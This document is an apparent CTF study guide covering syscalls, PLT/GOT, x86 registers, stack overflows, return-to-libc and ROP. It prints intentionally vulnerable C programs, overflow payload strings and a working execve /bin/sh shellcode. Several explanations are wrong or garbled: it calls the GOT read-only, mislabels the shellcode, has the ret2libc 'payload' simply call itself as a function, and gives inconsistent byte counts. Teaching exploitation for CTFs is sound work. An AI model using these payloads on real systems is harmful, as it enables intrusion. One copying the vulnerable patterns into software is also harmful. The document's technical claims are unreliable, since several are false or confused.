CTF basics!

Quick Reference for most basic CTFs

Basic Syscalls

fork creates a new process by duplicating the calling process, while exec replaces the current process image with a new process image.
fork creates a child process that is a clone of the parent process, while exec loads a new program into the current process.
The child process created by fork initially shares the same memory space as the parent process, while the exec system call loads a new program into a new memory space.
fork returns the process ID of the child process to the parent process, while exec does not return to the calling process.
fork is often used to create a new process that performs some task independently of the parent process, while exec is used to start a new program or to change the behavior of the current process.
The exec family of system calls includes several variants, such as execl, execv, execle, and execvp, which differ in the way they accept arguments and how they search for the new program.
The choice between fork and exec depends on the specific needs of the application and the desired behavior of the new process.

PLTs and GOTs

PLT stands for Procedure Linkage Table, and it is a data structure used in dynamic linking to call functions in shared libraries.
GOT stands for Global Offset Table, and it is another data structure used in dynamic linking to resolve the addresses of functions and data objects in shared libraries.
When a program calls a function in a shared library, the PLT is used to redirect the call to the GOT, which then resolves the address of the function and redirects the call to the actual function code.
The PLT and GOT are both created by the linker during the dynamic linking process, and they are stored in a read-only section of the program's memory.
The use of PLTs and GOTs helps to reduce the size of shared libraries and allows them to be shared across multiple programs in memory, improving memory efficiency.

x86 Stacks:

The x86 architecture has two stacks: the user stack and the kernel stack.
The user stack is used to store local variables and function call parameters in user-mode programs.
The kernel stack is used to store kernel-level variables and function call parameters in kernel-mode programs.
The stacks grow downwards in memory, with the stack pointer pointing to the top of the stack.
The stack pointer is maintained in the ESP (Extended Stack Pointer) register.
Pushing data onto the stack decreases the ESP value, while popping data off the stack increases the ESP value.

x86 Registers:

The x86 architecture has several types of registers, including general-purpose, segment, and control registers.
General-purpose registers are used for arithmetic and logic operations, and include EAX, EBX, ECX, EDX, ESI, EDI, and EBP.
The instruction pointer (IP) register stores the memory address of the next instruction to be executed.
Segment registers are used to point to different segments of memory, such as code or data segments.
Control registers are used to control system behavior, such as the flags register (EFLAGS), which contains status flags that indicate the result of arithmetic and logic operations.
The x86 architecture also includes several special registers, such as the floating-point unit (FPU) stack and the debug registers, which are used for debugging purposes.
- Rax - accumulator: arithmetic operations and function return values.
- Rbx - base: memory addressing and as a general-purpose register.
- Rcx - counter: loop iterations and function arguments.
- Rdx - data: Data register used for arithmetic operations and as a general-purpose register.
- Rsi: Source index register used for string operations and memory addressing.
- Rdi: Destination index register used for string operations and memory addressing.
- Rbp: Base pointer register used for accessing function parameters and local variables on the stack.
- Rsp: Stack pointer register used for pointing to the top of the stack.

	Stack	Heap
Purpose	Used to store function calls and values	Used for dynamic memory allocation
Data structure	Last In First Out (LIFO)	Not organized, data is randomly stored
Memory allocation	Automatic	Manual, managed by the programmer or operating system
Memory allocation/deallocation time	Very fast	Slower than stack
Size limit	Fixed, smaller than heap	Not fixed, larger than stack
Access speed	Fastest	Slower than stack

Stack overflows

Most basic type of attack you must understand - do not skip! Stack overflow is a type of Buffer overflows. Every process has a memory map. Each memory map has 4 areas: Application, Heap, Libraries, Stack. RBP tells you where the stack “ends”, RSP tells you where the stack “starts”. Stack grows in one direction: either “up” or “down” - depending on convention. Every function gets a stack frame.

Buffer overflow attacks occur when an attacker sends more data than a program has allocated memory for, which can overwrite adjacent memory areas, including the stack. Here is how a buffer overflow attack works on stacks using a simple C example:

In C, a stack is used to store local variables and function calls. The stack grows downward from high memory addresses to low memory addresses.
A buffer is a temporary storage area in memory that can hold a set amount of data. When an attacker inputs more data than the buffer can hold, it overflows into adjacent memory areas, including the stack.
An attacker can exploit this vulnerability by injecting malicious code into the overflowed buffer, which can alter the program's control flow, hijack its execution, or execute arbitrary code.
Here is an example vulnerable program in C:

#include <stdio.h>
#include <string.h>

void vulnerable_function(char* input) {
    char buffer[10];
    strcpy(buffer, input);
    printf("Input: %s\n", buffer);
}

int main() {
    char input[20];
    printf("Enter input: ");
    gets(input);
    vulnerable_function(input);
    return 0;
}

In this program, vulnerable_function() copies the input string into a buffer that is only 10 bytes long. If the input string is longer than 10 bytes, it will overflow the buffer and overwrite adjacent memory areas.

An attacker can send a payload to exploit this vulnerability, such as:

char payload[] = "AAAAAAAAAAAAAAAAAAAA\xef\xbe\xad\xde";

In this payload, the first 20 bytes are A characters, which will fill up the buffer. The last four bytes \xef\xbe\xad\xde will overwrite adjacent memory areas and change the program's control flow to execute arbitrary code.

An attacker can send the payload to the program via input, and it will execute arbitrary code:

Enter input: AAAAAAAAAAAAAAAAAAAA����
Segmentation fault

In this case, the program crashes due to a segmentation fault caused by the overwritten memory areas. But an attacker can use this technique to execute arbitrary code, which can be malicious and damaging. I’ve kept the example short, but an attacker might use /bin/sh little endian representation.

Little Endian: I’m not talking about my little brother. Little endian is a ridiculous looking way to pass values to x86. This is the following for /bin/sh. It is least significant bit first.

char *shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
          "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; // little endian representation of bin/sh payload shellcode

👉 Reiterating!

The attacker identifies the memory location of the return address on the stack that controls the program's execution after the vulnerable function completes.
The attacker prepares a payload that includes a NOP sledge followed by shellcode. A NOP sledge is a series of no-operation instructions (\x90 bytes) that serve as a buffer between the overwritten return address and the shellcode. This buffer is important because it allows the processor to transition smoothly from the return address to the shellcode, without encountering any invalid instructions in the process.
The attacker calculates the number of NOP bytes needed to reach the shellcode. Let's say the shellcode is 23 bytes long, and the return address is located 32 bytes after the start of the buffer. The attacker would need to add 9 NOP bytes to the payload to reach the shellcode (32 bytes - 23 bytes = 9 bytes).
The attacker constructs the payload by filling the buffer with A characters (or any other character that can be easily identified in the debugger), followed by the NOP sledge and the shellcode. The return address is set to the location of the NOP sledge within the buffer.
The attacker sends the payload to the program, which will copy the input string into the buffer and overwrite the return address with the address of the NOP sledge.
When the vulnerable function completes and tries to return to the overwritten address, it will start executing the NOP sledge, which serves as a buffer to reach the shellcode. The shellcode will then be executed, allowing the attacker to take control of the program and execute arbitrary instructions.

Ret2Libc: What if there’s an exit(0)

Return-to-libc is a technique used in computer security to exploit vulnerabilities in a program that allow an attacker to control the contents of the program's stack, even if they cannot execute injected code. The basic idea is to use existing code in the program, specifically functions in the libc library, to perform the attacker's desired actions.

Example: If the vulnerable function ends with an exit() call, it will terminate the program, and the attacker will not be able to gain control of the program's execution flow. However, if the attacker can overwrite the exit() function's return address with the address of their malicious code, they can redirect the program's execution to that code before the program exits, giving them control.

Here's an example of how an attacker could still use a buffer overflow attack to redirect program execution to their shellcode even if the vulnerable function ends with an exit() call:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void vulnerable_function(char* input) {
    char buffer[10];
    strcpy(buffer, input);
    printf("Input: %s\n", buffer);
    exit(0); // vulnerable function ends with an exit call
}

int main() {
    char input[20];
    printf("Enter input: ");
    gets(input);
    vulnerable_function(input);
    return 0;
}

In this modified program, the vulnerable_function() ends with an exit(0) call. However, an attacker can still exploit the buffer overflow vulnerability to redirect program execution to their shellcode. They can overwrite the exit() function's return address on the stack with the address of their shellcode.

To do this, the attacker can construct a payload that includes a "return-to-libc" attack. This type of attack replaces the return address on the stack with the address of a function in a shared library, such as system() or execve(), which the attacker can use to execute arbitrary shellcode. Here is an example payload that would execute /bin/sh using the system() function:

#include <stdio.h>
#include <stdlib.h>

int main() {
    char payload[] = "AAAAAAAAAAAAAAAAAAAABBBBCCCC\x18\xa0\x04\x08\xed\x1d\x83\x04/bin/sh";
    printf("Payload length: %d\n", strlen(payload));
    ((void (*)())payload)();
    return 0;
}

In this payload, the first 20 bytes are A characters, which will fill up the buffer. The next 8 bytes are the original return address of vulnerable_function(). The next 4 bytes are the address of the system() function in the program's shared library (this address can be obtained using a debugger or other tools). Finally, the last 8 bytes are the argument to the system() function, which is the string /bin/sh.

When the payload is executed, it will overflow the buffer in vulnerable_function() and overwrite the return address on the stack with the address of the system() function. The system() function will be called with the argument /bin/sh, which will execute a shell with root privileges, giving the attacker complete control over the system.

So, in summary, even if the vulnerable function ends with an exit() call, an attacker can still use a buffer overflow attack to redirect program execution to their shellcode by overwriting the return address of the exit() function on the stack.

Another example: Let's say we have a vulnerable program that takes input from the user and passes it to a function called strcpy without any bounds checking. This creates a buffer overflow vulnerability that we can exploit.

Our goal is to execute a command on the system using the system function from the libc library, with our own argument string. However, we can't inject any code of our own.

Instead, we can use the buffer overflow to overwrite the return address on the stack, which determines where the program will jump to after the strcpy function returns. We can set the return address to point to the system function in the libc library, and arrange the stack to include our desired argument string.

So, when the vulnerable program returns from the strcpy function, it will jump to the system function instead of continuing with its normal execution. The system function will then execute the command we specified with our argument string.

This attack works because the system function and other useful functions like execve are commonly used in programs and are present in the libc library, which is linked into virtually all programs. However, modern defenses like stack canaries and non-executable memory have made return-to-libc attacks much more difficult to carry out.

Return Oriented Programming: Corrupting return address

Return Oriented Programming (ROP) is a technique used by attackers to execute code in a program by chaining together small snippets of existing code called "gadgets". These gadgets typically end with a "return" instruction, hence the name "return-oriented" programming. By stringing together a series of these gadgets, an attacker can create arbitrary instructions that perform their intended malicious action.

Here is a simple example of ROP:

Let's say we have a vulnerable program that takes input from the user and stores it in a buffer without proper bounds checking. The attacker can overflow the buffer with a string of their choice and overwrite the return address on the stack with the address of a gadget in the program. This gadget could be a small piece of code that performs a useful operation, such as writing a specific value to a certain memory location.

Next, the attacker can continue overflowing the buffer with additional gadgets, each ending with a "return" instruction that jumps to the next gadget in the chain. By chaining together a series of gadgets, the attacker can create arbitrary instructions that perform their intended malicious action, such as spawning a shell or stealing sensitive information.

For example, let's say the vulnerable program has a gadget that performs the instruction "mov eax, 0xdeadbeef". The attacker could overwrite the return address on the stack with the address of this gadget, and then continue overflowing the buffer with additional gadgets that perform other useful operations, such as "mov ebx, 0xcafebabe" and "int 0x80" to spawn a shell. By chaining together these gadgets, the attacker can create the arbitrary instructions needed to perform their intended action.

More videos on this topic